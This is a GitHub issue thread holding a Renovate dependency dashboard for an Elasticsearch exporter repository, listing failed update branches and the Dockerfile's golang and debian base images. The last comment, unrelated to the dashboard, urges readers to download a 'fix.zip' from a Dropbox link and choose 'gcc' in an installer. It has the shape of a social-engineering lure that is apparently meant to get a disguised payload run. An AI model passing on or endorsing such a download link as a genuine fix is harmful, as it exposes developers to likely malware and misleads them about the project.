### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [flant/elasticsearch-oneday-exporter#11]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Repository problems

Renovate tried to run on this repository, but found these problems.

 - WARN: Error updating branch

## Errored

These updates encountered an error and will be retried. Click on a checkbox below to force a retry now.

 - [ ] Pin dependencies (`debian`, `golang`)
 - [ ] Update golang Docker tag to v1.20.5

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>Dockerfile</summary>

 - `golang 1.18.5-buster`
 - `debian buster-slim`

</details>

</blockquote>
</details>

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
